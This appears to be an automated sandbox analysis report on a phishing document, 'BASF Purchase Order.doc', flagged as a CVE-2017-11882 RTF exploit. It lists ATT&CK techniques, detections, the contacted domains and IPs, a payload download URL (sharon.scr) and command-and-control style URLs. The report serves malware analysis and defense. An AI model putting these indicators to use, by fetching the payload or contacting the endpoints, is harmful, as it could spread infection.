Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E96CB6 sqlite3_step,sqlite3_bind_int,sqlite3_malloc,memcmp,sqlite3_finalize,sqlite3_free,sqlite3_prepare_v2,sqlite3_free,sqlite3_free,sqlite3_step,sqlite3_reset,sqlite3_reset,sqlite3_stricmp,sqlite3_malloc,sqlite3_step,sqlite3_reset,	8_2_61E96CB6

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 Scheduled Task/Job	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	312 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	16 System Information Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	31 Obfuscated Files or Information	NTDS	2 Security Software Discovery	Distributed Component Object Model	1 Email Collection	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	41 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BASF Purchase Order.doc	41%	Virustotal		Browse
BASF Purchase Order.doc	42%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sqlite3.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
dukeenergyltd.top	21%	Virustotal	Browse
www.xn--matfrmn-jxa4m.se	0%	Virustotal	Browse
jnkinteractive.co.kr	0%	Virustotal	Browse
exclaimer342200213.net	1%	Virustotal	Browse
www.kinkynerdspro.blog	4%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.terelprime.com	4%	Virustotal	Browse
mrart.co.kr	0%	Virustotal	Browse
aceautocorp.com	1%	Virustotal	Browse
www.touchclean.top	1%	Virustotal	Browse
www.sqlite.org	0%	Virustotal	Browse
www.chrisdomond.com	1%	Virustotal	Browse
www.99b6q.xyz	0%	Virustotal	Browse
www.exclaimer342200213.net	3%	Virustotal	Browse
www.mrart.co.kr	0%	Virustotal	Browse
www.ibistradingco.com	1%	Virustotal	Browse
www.besthomeincome24.com	0%	Virustotal	Browse
www.jnkinteractive.co.kr	0%	Virustotal	Browse
www.aceautocorp.com	1%	Virustotal	Browse
www.primeplay88.org	4%	Virustotal	Browse
www.elenagilherrero.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://support.google.com/chrome/?p=plugin_flash	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://dukeenergyltd.top/sharon.scr	22%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.riveramayahousing.com	208.91.197.13	true	true		unknown
dukeenergyltd.top	188.114.97.3	true	true	21%, Virustotal, Browse	unknown
www.xn--matfrmn-jxa4m.se	194.9.94.86	true	true	0%, Virustotal, Browse	unknown
jnkinteractive.co.kr	183.111.183.31	true	true	0%, Virustotal, Browse	unknown
exclaimer342200213.net	84.33.215.91	true	true	1%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	0%, Virustotal, Browse	unknown
www.kinkynerdspro.blog	54.38.220.85	true	true	4%, Virustotal, Browse	unknown
www.terelprime.com	66.96.161.166	true	true	4%, Virustotal, Browse	unknown
www.elenagilherrero.com.cdn.hstgr.net	93.127.187.187	true	true		unknown
www.ibistradingco.com.cdn.hstgr.net	89.116.109.159	true	true		unknown
www.touchclean.top	67.223.117.189	true	true	1%, Virustotal, Browse	unknown
mrart.co.kr	183.111.183.31	true	true	0%, Virustotal, Browse	unknown
aceautocorp.com	198.12.241.35	true	true	1%, Virustotal, Browse	unknown
www.platinummedia.info	172.67.182.131	true	true		unknown
www.sqlite.org	45.33.6.223	true	false	0%, Virustotal, Browse	unknown
www.chrisdomond.com	unknown	unknown	false	1%, Virustotal, Browse	unknown
www.99b6q.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.exclaimer342200213.net	unknown	unknown	false	3%, Virustotal, Browse	unknown
www.besthomeincome24.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.mrart.co.kr	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.ibistradingco.com	unknown	unknown	false	1%, Virustotal, Browse	unknown
www.jnkinteractive.co.kr	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.elenagilherrero.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.aceautocorp.com	unknown	unknown	false	1%, Virustotal, Browse	unknown
www.primeplay88.org	unknown	unknown	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.riveramayahousing.com/ufuh/	true		unknown
https://dukeenergyltd.top/sharon.scr	true	22%, Virustotal, Browse	unknown
http://www.terelprime.com/ufuh/?ZXdp=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&7jsp7=zz9xHbtX	true		unknown
http://www.exclaimer342200213.net/ufuh/	true		unknown
http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip	false		unknown
http://www.kinkynerdspro.blog/ufuh/	true		unknown
http://www.jnkinteractive.co.kr/ufuh/	true		unknown
http://www.riveramayahousing.com/ufuh/?ZXdp=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&7jsp7=zz9xHbtX	true		unknown
http://www.mrart.co.kr/ufuh/	true		unknown
http://www.platinummedia.info/ufuh/	true		unknown
http://www.ibistradingco.com/ufuh/	true		unknown
http://www.touchclean.top/ufuh/?ZXdp=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&7jsp7=zz9xHbtX	true		unknown
http://www.jnkinteractive.co.kr/ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&7jsp7=zz9xHbtX	true		unknown
http://www.xn--matfrmn-jxa4m.se/ufuh/	true		unknown
http://www.primeplay88.org/ufuh/?ZXdp=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&7jsp7=zz9xHbtX	true		unknown
http://www.primeplay88.org/ufuh/	true		unknown
http://www.aceautocorp.com/ufuh/	true		unknown
http://www.xn--matfrmn-jxa4m.se/ufuh/?ZXdp=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&7jsp7=zz9xHbtX	true		unknown
http://www.elenagilherrero.com/ufuh/?ZXdp=AB4ctQE666ii/AhBeU9kZh5iWeUIVV2Kc96SebEnk+bcHC5BDpeWN0JKSYAnMmkj4c+BMV0TAiBI+jfmHribLN3e02N+gzPDpozTfLSXwflSzJVcZV+WbefZbN8X&7jsp7=zz9xHbtX	true		unknown
http://www.ibistradingco.com/ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&7jsp7=zz9xHbtX	true		unknown
http://www.elenagilherrero.com/ufuh/	true		unknown
http://www.kinkynerdspro.blog/ufuh/?ZXdp=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&7jsp7=zz9xHbtX	true		unknown
http://www.aceautocorp.com/ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&7jsp7=zz9xHbtX	true		unknown
http://www.exclaimer342200213.net/ufuh/?ZXdp=5rQyp7AfCpcectMtK85Tor8vuSCbHlk40GVR54bgOEPBq5WbA6vQ6axdzD+rl+5xsD3/ThNnrc69/oVplzpG8oUJt2RlBzVyO+lvFGg0fvO7LE0dkvQsR1cSiZis&7jsp7=zz9xHbtX	true		unknown
http://www.touchclean.top/ufuh/	true		unknown
http://www.mrart.co.kr/ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&7jsp7=zz9xHbtX	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false		unknown
https://dukeenergyltd.top/	EQNEDT32.EXE, 00000002.00000002.359706346.000000000057C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.globalsign.i	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.google.com/chrome/?p=plugin_flash	dfrgui.exe, 00000008.00000003.470423056.0000000006322000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dukeenergyltd.top/s	EQNEDT32.EXE, 00000002.00000002.359706346.000000000057C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://static.loopia.se/responsive/images/iOS-72.png	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://mrart.co.kr/ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR	dfrgui.exe, 00000008.00000002.878728836.00000000037B2000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000003D52000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://tools.ietf.org/html/rfc4287	sharon48399.scr.2.dr	false		unknown
https://dukeenergyltd.top/sharon.scrkkC:	EQNEDT32.EXE, 00000002.00000002.359706346.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://dukeenergyltd.top/sharon.scrj	EQNEDT32.EXE, 00000002.00000002.359706346.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.searchvity.com/?dn=	dfrgui.exe, 00000008.00000002.878728836.0000000002E46000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.00000000033E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.0000000000CA6000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	dfrgui.exe, 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	false	URL Reputation: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.elenagilherrero.com	sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878421508.000000000053F000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://static.loopia.se/responsive/images/iOS-114.png	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	false	URL Reputation: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://aceautocorp.com/ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto	dfrgui.exe, 00000008.00000002.878728836.0000000003620000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000003BC0000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false		unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false	URL Reputation: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://static.loopia.se/responsive/styles/reset.css	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://jnkinteractive.co.kr/ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UM	dfrgui.exe, 00000008.00000002.878728836.0000000003C68000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000004208000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.google.com/favicon.ico	13d6pS3.8.dr	false		unknown
http://schemas.datacontract.org/2004/07/3WebScriptEnablingBehavior	sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	false		unknown
http://validator.w3.org/feed/docs/rss2.html	sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	false		unknown
https://ac.ecosia.org/autocomplete?q=	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ibistradingco.com/ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZe	dfrgui.exe, 00000008.00000002.878728836.0000000003AD6000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000004076000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.rfc-editor.org/rfc/rfc5023.txt	sharon48399.scr.2.dr	false		unknown
http://www.searchvity.com/	dfrgui.exe, 00000008.00000002.878728836.0000000002E46000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.00000000033E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.0000000000CA6000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.86	www.xn--matfrmn-jxa4m.se	Sweden	39570	LOOPIASE	true
45.33.6.223	www.sqlite.org	United States	63949	LINODE-APLinodeLLCUS	false
172.67.182.131	www.platinummedia.info	United States	13335	CLOUDFLARENETUS	true
